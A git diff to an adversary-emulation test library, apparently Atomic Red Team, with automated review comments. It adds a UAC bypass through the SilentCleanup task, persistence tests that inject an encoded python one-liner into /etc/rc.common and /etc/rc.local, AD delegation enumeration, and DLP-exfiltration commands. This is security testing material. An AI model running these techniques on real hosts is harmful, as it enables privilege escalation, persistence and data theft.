- Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
- Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
+ - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
- [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
- Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
- Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md
index 241437be..420df707 100644
--- a/atomics/Indexes/Matrices/linux-matrix.md
+++ b/atomics/Indexes/Matrices/linux-matrix.md
@@ -23,7 +23,7 @@
| | [Systemd Timers](../../T1053.006/T1053.006.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Keylogging](../../T1056.001/T1056.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
| | [Unix Shell](../../T1059.004/T1059.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -40,7 +40,7 @@
| | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
-| | | RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
+| | | [RC Scripts](../../T1037.004/T1037.004.md) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | |
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index af7d14dd..9500a007 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -10120,6 +10120,31 @@ privilege-escalation:
'
name: command_prompt
elevation_required: true
+ - name: Bypass UAC using SilentCleanup task
+ auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608
+ description: |
+ Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
+
+ There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
+
+ For example, we can set the windir registry kye to: "cmd /k REM "
+
+ And forcefully run SilentCleanup task:
+
+ schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
+
+ REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_path:
+ description: Path to the bat file
+ type: String
+ default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat
+ executor:
+ command: "#{file_path}\n"
+ name: command_prompt
+ elevation_required: false
T1574.012:
technique:
external_references:
@@ -15364,6 +15389,48 @@ privilege-escalation:
'
elevation_required: true
name: bash
+ - name: rc.common
+ auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
+ description: 'Modify rc.common
+
+'
+ supported_platforms:
+ - linux
+ executor:
+ name: bash
+ elevation_required: true
+ command: |
+ filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
+ printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
+ echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
+ printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
+ sudo chmod +x /etc/rc.common
+ cleanup_command: 'origfilename=''/etc/rc.common.original'';if [ ! -f $origfilename
+ ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common
+ && sudo rm $origfilename;fi
+
+'
+ - name: rc.local
+ auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
+ description: 'Modify rc.local
+
+'
+ supported_platforms:
+ - linux
+ executor:
+ name: bash
+ elevation_required: true
+ command: |
+ filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
+ printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
+ echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
+ printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
+ sudo chmod +x /etc/rc.local
+ cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename
+ ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
+ sudo rm $origfilename;fi
+
+'
T1547.007:
technique:
created: '2020-01-24T18:15:06.641Z'
@@ -19315,6 +19382,31 @@ defense-evasion:
'
name: command_prompt
elevation_required: true
+ - name: Bypass UAC using SilentCleanup task
+ auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608
+ description: |
+ Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
+
+ There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
+
+ For example, we can set the windir registry kye to: "cmd /k REM "
+
+ And forcefully run SilentCleanup task:
+
+ schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
+
+ REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_path:
+ description: Path to the bat file
+ type: String
+ default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat
+ executor:
+ command: "#{file_path}\n"
+ name: command_prompt
+ elevation_required: false
T1218.003:
technique:
external_references:
@@ -28887,11 +28979,9 @@ defense-evasion:
description: SMTP Server IP Address
type: string
default: 127.0.0.1
- dependency_executor_name: powershell
executor:
- command: '"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027
- Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
- -SmtpServer #{smtp_server}"
+ command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject ''T1027_Atomic_Test''
+ -Attachments #{input_file} -SmtpServer #{smtp_server}
'
name: powershell
@@ -28911,9 +29001,8 @@ defense-evasion:
description: Destination IP address
type: string
default: 127.0.0.1
- dependency_executor_name: powershell
executor:
- command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+ command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
'
name: powershell
@@ -42988,6 +43077,48 @@ persistence:
'
elevation_required: true
name: bash
+ - name: rc.common
+ auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
+ description: 'Modify rc.common
+
+'
+ supported_platforms:
+ - linux
+ executor:
+ name: bash
+ elevation_required: true
+ command: |
+ filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
+ printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
+ echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
+ printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
+ sudo chmod +x /etc/rc.common
+ cleanup_command: 'origfilename=''/etc/rc.common.original'';if [ ! -f $origfilename
+ ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common
+ && sudo rm $origfilename;fi
+
+'
+ - name: rc.local
+ auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
+ description: 'Modify rc.local
+
+'
+ supported_platforms:
+ - linux
+ executor:
+ name: bash
+ elevation_required: true
+ command: |
+ filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
+ printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
+ echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
+ printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
+ sudo chmod +x /etc/rc.local
+ cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename
+ ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
+ sudo rm $origfilename;fi
+
+'
T1542.004:
technique:
created: '2020-10-20T00:05:48.790Z'
@@ -49382,6 +49513,49 @@ discovery:
'
name: command_prompt
+ - name: Enumerate Active Directory for Unconstrained Delegation
+ auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b
+ description: |
+ Attackers may attempt to query for computer objects with the UserAccountControl property
+ 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set
+ More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce
+ Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
+ supported_platforms:
+ - windows
+ input_arguments:
+ domain:
+ description: Domain FQDN
+ type: String
+ default: contoso.com
+ uac_prop:
+ description: UAC Property to search
+ type: String
+ default: 524288
+ dependencies:
+ - description: 'PowerShell ActiveDirectory Module must be installed
+
+'
+ prereq_command: |
+ Try {
+ Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+ exit 0
+ }
+ Catch {
+ exit 1
+ }
+ get_prereq_command: |
+ if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+ Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+ } else {
+ Install-WindowsFeature RSAT-AD-PowerShell
+ }
+ executor:
+ name: powershell
+ elevation_required: false
+ command: 'Get-ADObject -LDAPFilter ''(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})''
+ -Server #{domain}
+
+'
T1069.002:
technique:
external_references:
diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md
index 74a09cdb..9f34ff74 100644
--- a/atomics/T1027/T1027.md
+++ b/atomics/T1027/T1027.md
@@ -203,7 +203,7 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p
```powershell
-"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}"
+Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server}
```
@@ -234,7 +234,7 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p
```powershell
-Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
```
diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml
index 4288d3ae..7210e5af 100644
--- a/atomics/T1027/T1027.yaml
+++ b/atomics/T1027/T1027.yaml
@@ -109,7 +109,7 @@ atomic_tests:
supported_platforms:
- windows
input_arguments:
- input_file:
+ input_file:
description: Path of the XLSM file
type: path
default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
@@ -125,10 +125,9 @@ atomic_tests:
description: SMTP Server IP Address
type: string
default: 127.0.0.1
- dependency_executor_name: powershell
executor:
command: |
- "Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}"
+ Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server}
name: powershell
- name: DLP Evasion via Sensitive Data in VBA Macro over HTTP
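Review bot: `#{input_file}` is interpolated unquoted on the rewritten `Send-MailMessage` line, so if `PathToAtomicsFolder` resolves to a directory containing spaces the `-Attachments` argument is split and the test fails before anything is sent; `-Attachments "#{input_file}"` keeps the parameter intact. The same unquoted substitution appears on the `-Body #{input_file}` line in the next hunk of this file and in the regenerated copies in index.yaml and T1027.md. Dropping `dependency_executor_name` is harmless here because the test declares no `dependencies` block.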
@@ -147,8 +146,7 @@ atomic_tests:
description: Destination IP address
type: string
default: 127.0.0.1
- dependency_executor_name: powershell
executor:
command: |
- Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+ Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
name: powershell
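Review bot: The new command passes the file path to `-Body`, and as far as I can tell `Invoke-WebRequest` sends a string `-Body` verbatim, so this test POSTs the literal path text rather than the XLSM contents it claims to exfiltrate (the old line had the same problem, but it is now parameterised so the intent is clearer). If the goal is to transmit the file, `Invoke-WebRequest -Uri #{ip_address} -Method POST -InFile "#{input_file}"` does that; otherwise the description of this test should say the body is only the path. The index.yaml and T1027.md copies of this command carry the same text.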
diff --git a/atomics/T1037.004/T1037.004.md b/atomics/T1037.004/T1037.004.md
index 994659fb..5e258a38 100644
--- a/atomics/T1037.004/T1037.004.md
+++ b/atomics/T1037.004/T1037.004.md
@@ -12,6 +12,10 @@ Several Unix-like systems have moved to Systemd and deprecated the use of RC scr
- [Atomic Test #1 - rc.common](#atomic-test-1---rccommon)
+- [Atomic Test #2 - rc.common](#atomic-test-2---rccommon)
+
+- [Atomic Test #3 - rc.local](#atomic-test-3---rclocal)
+
@@ -38,4 +42,68 @@ sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /e
+
+
+
+## Atomic Test #2 - rc.common
+Modify rc.common
+
+**Supported Platforms:** Linux
+
+
+
+
+
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
+
+
+```bash
+filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
+printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
+echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
+printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
+sudo chmod +x /etc/rc.common
+```
+
+#### Cleanup Commands:
+```bash
+origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi
+```
+
+
+
+
+
+
+
+
+## Atomic Test #3 - rc.local
+Modify rc.local
+
+**Supported Platforms:** Linux
+
+
+
+
+
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
+
+
+```bash
+filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
+printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
+echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
+printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
+sudo chmod +x /etc/rc.local
+```
+
+#### Cleanup Commands:
+```bash
+origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi
+```
+
+
+
+
+
diff --git a/atomics/T1037.004/T1037.004.yaml b/atomics/T1037.004/T1037.004.yaml
index 8b664b82..6004b8b4 100644
--- a/atomics/T1037.004/T1037.004.yaml
+++ b/atomics/T1037.004/T1037.004.yaml
@@ -15,3 +15,42 @@ atomic_tests:
elevation_required: true
name: bash
+
+- name: rc.common
+ auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
+ description: |
+ Modify rc.common
+
+ supported_platforms:
+ - linux
+ executor:
+ name: bash
+ elevation_required: true
+ command: |
+ filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
+ printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
+ echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
+ printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
+ sudo chmod +x /etc/rc.common
+ cleanup_command: |
+ origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi
+
+- name: rc.local
+ auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
+ description: |
+ Modify rc.local
+
+ supported_platforms:
+ - linux
+ executor:
+ name: bash
+ elevation_required: true
+ command: |
+ filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
+ printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
+ echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
+ printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
+ sudo chmod +x /etc/rc.local
+ cleanup_command: |
+ origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi
+
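Review bot: The new test's `name: rc.common` duplicates the name of the existing Atomic Test #1 in this technique (visible in the T1037.004.md table of contents in this commit), so selecting a test by name becomes ambiguous; a distinguishing name such as `name: rc.common (Linux)` avoids that. The cleanup commands restore or remove the rc file but not the artifact the injected line creates once it runs, so `sudo rm -f /tmp/T1037.004.rc.common` (and `/tmp/T1037.004.rc.local` in the second test) belongs in `cleanup_command`. The one-line descriptions "Modify rc.common" / "Modify rc.local" should state that the appended line is a base64-encoded python3 one-liner that writes that marker file at boot, and which init systems are expected to execute `/etc/rc.common` or `/etc/rc.local` on a Linux host (this technique's markdown header notes RC scripts are deprecated under systemd), so a tester knows what to observe and when. If a `.original` backup is left behind by an interrupted run, the first line overwrites it with the already-modified file; checking for an existing backup before copying would preserve the true original. The same text appears in the index.yaml hunks and T1037.004.md, which presumably need regenerating after any change here.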
diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md
index 2b80197a..f39060c1 100644
--- a/atomics/T1087.002/T1087.002.md
+++ b/atomics/T1087.002/T1087.002.md
@@ -24,6 +24,8 @@ Commands such as net user /domain and net group /domain
@@ -344,4 +346,59 @@ net user administrator /domain
+
+
+
+## Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation
+Attackers may attempt to query for computer objects with the UserAccountControl property
+'TRUSTED_FOR_DELEGATION' (0x80000;524288) set
+More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce
+Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| domain | Domain FQDN | String | contoso.com|
+| uac_prop | UAC Property to search | String | 524288|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: PowerShell ActiveDirectory Module must be installed
+##### Check Prereq Commands:
+```powershell
+Try {
+ Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+ exit 0
+}
+Catch {
+ exit 1
+}
+```
+##### Get Prereq Commands:
+```powershell
+if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+ Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+} else {
+ Install-WindowsFeature RSAT-AD-PowerShell
+}
+```
+
+
+
+
diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml
index d8f3a3f4..61822ffb 100644
--- a/atomics/T1087.002/T1087.002.yaml
+++ b/atomics/T1087.002/T1087.002.yaml
@@ -69,7 +69,7 @@ atomic_tests:
name: powershell
- name: Adfind -Listing password policy
auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600
- description: |
+ description: |
Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy.
reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
supported_platforms:
@@ -93,7 +93,7 @@ atomic_tests:
name: command_prompt
- name: Adfind - Enumerate Active Directory Admins
auto_generated_guid: b95fd967-4e62-4109-b48d-265edfd28c3a
- description: |
+ description: |
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts
reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/
supported_platforms:
@@ -117,7 +117,7 @@ atomic_tests:
name: command_prompt
- name: Adfind - Enumerate Active Directory User Objects
auto_generated_guid: e1ec8d20-509a-4b9a-b820-06c9b2da8eb7
- description: |
+ description: |
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
supported_platforms:
@@ -141,7 +141,7 @@ atomic_tests:
name: command_prompt
- name: Adfind - Enumerate Active Directory Exchange AD Objects
auto_generated_guid: 5e2938fb-f919-47b6-8b29-2f6a1f718e99
- description: |
+ description: |
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
supported_platforms:
@@ -173,3 +173,44 @@ atomic_tests:
command: |
net user administrator /domain
name: command_prompt
+
+- name: Enumerate Active Directory for Unconstrained Delegation
+ auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b
+ description: |
+ Attackers may attempt to query for computer objects with the UserAccountControl property
+ 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set
+ More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce
+ Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
+ supported_platforms:
